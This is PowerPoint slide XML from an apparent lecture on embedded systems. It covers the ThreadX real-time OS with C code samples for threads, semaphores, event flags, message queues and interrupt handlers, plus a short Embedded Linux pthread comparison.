              <a:t>System requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Processor support</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code / data size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scheduling / latency / performance requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Supported services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Budget</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compiler / Linker / Debugger support</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Profiling capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31368765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ThreadX</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Developed by Express Logic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Code size / data size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All objects are owned by the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scheduling Algorithm – Priority + Round Robin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Semaphore, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Message Queue, Event Flag, Timer, Byte Pool, Block Pool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>EL Also supports extensions for file system, USB stack, GUI and network stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327235918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Integration with code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Initialization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Initialize critical hardware and C runtime, and call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>main</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>main </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> function calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>tx_kernel_enter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to initialize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ThreadX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>It never returns </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>tx_application_define</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is called by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ThreadX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to initialize any threads, semaphores, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ISR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>tx_thread_context_save</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>tx_thread_context_restore</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Timer ISR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>tx_timer_interrupt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="248785822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371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code Samples</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="775500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14400" y="1981200"/>
          <a:ext cx="7327900" cy="4114800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s1066"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235538439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7652" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="838200"/>
            <a:ext cx="7848600" cy="575468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TICKS_PER_SECOND	        (100)</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LED_TASK_STACK_SIZE         (4096)</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LED_TASK_PRIORITY           (12)</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unsigned char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ledTaskStack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[LED_TASK_STACK_SIZE];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>TX_THREAD </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err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</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main()</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tx_kernel_enter</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ledInit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008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tx_thread_create</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"led task",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 0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ledTaskStack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 				LED_TASK_STACK_SIZE, LED_TASK_PRIORITY, 			LED_TASK_PRIORITY, TX_NO_TIME_SLICE, 			TX_AUTO_START);</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06678467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8676" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="838200"/>
            <a:ext cx="7848600" cy="230822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tx_thread_sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(TICKS_PER_SECOND / 2);</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82165153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Embedded Linux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9700" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="838200"/>
            <a:ext cx="7848600" cy="5754688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pthread_t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err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</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main()</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ledInit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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pthread_create</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NULL, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                       (void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 NULL);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>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pthread_join</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NULL);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0;</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usleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(500000);</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89748296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Semaphore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0724" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="838200"/>
            <a:ext cx="7848600" cy="4278313"/>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TX_SEMAPHORE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 “Task Semaphore", 1);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008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tx_semaphore_get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 TX_WAIT_FOREVER);</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97783436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Semaphore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1748" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="838200"/>
            <a:ext cx="7848600" cy="2308225"/>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tx_semaphore_put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44786846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Event Flags-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2772" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="838200"/>
            <a:ext cx="7848600" cy="600233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TX_EVENT_FLAGS_GROUP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PACKET_RECEIVE 0x1</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BUTTON_PRESS 0x2</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tx_event_flags_create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“Task EF", 1);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008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mainTask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ULONG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	</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tx_event_flags_get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PACKET_RECEIVE | BUTTON_PRESS, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>			    TX_OR_CLEAR, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                          &amp;</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TX_WAIT_FOREVER);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&amp; CLOCK_INTERRUPT)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greenLedToggle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&amp; BUTTON_PRESS)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redledToggle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20008878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Event Flags-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3796" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="838200"/>
            <a:ext cx="7848600" cy="2554288"/>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tx_event_flags_set</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 BUTTON_PRESS, 				         TX_OR);</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09747508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Interrupt - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>ThreadX</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="838200"/>
            <a:ext cx="7848600" cy="2062163"/>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NETWORK_ISR:</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tx_thread_context_save</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NetworkInterruptHandler</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jal</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tx_thread_context_restore</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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TIMER_ISR:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	 b       _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tx_timer_interrupt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34820" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="3163888"/>
            <a:ext cx="7848600" cy="3694112"/>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NetworkInterruptHandler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UINT32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(NETWORK_ICR) &amp; _ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(NETWORK_IER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(NETWORK_ICR); // acknowledge</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NETWORK_PACKET_RECEIVED)</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tx_event_flags_set</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taskEvents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> , 						   PACKET_RECEIVE, 				         	   TX_OR);</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64310356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Message Q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5844" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="838200"/>
            <a:ext cx="7848600" cy="550862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TX_QUEUE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queueBuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[100];</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tx_queue_create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"queue 0", TX_1_ULONG, 				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>queueBuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 100*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(ULONG));</a:t>
            </a:r>
          </a:p>
          <a:p>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a:t>
            </a:r>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status = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tx_queue_receive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&amp;</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 TX_WAIT_FOREVER);</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 % 3) == 0)</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041339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Message Q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6868" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="838200"/>
            <a:ext cx="7848600" cy="3540125"/>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ULONG counter = 0;</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counter++;</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tx_queue_send</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&amp;counter, TX_WAIT_FOREVER);</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6898895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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The Processor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292867" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="8229600" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Micro-processor – a CPU (central processing unit)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Micro-controller – a micro-processor for embedded systems; may include some memory or peripherals on chip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>DSP – Digital Signaling processor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Many processor architectures (“families” ):</a:t>
            </a:r>
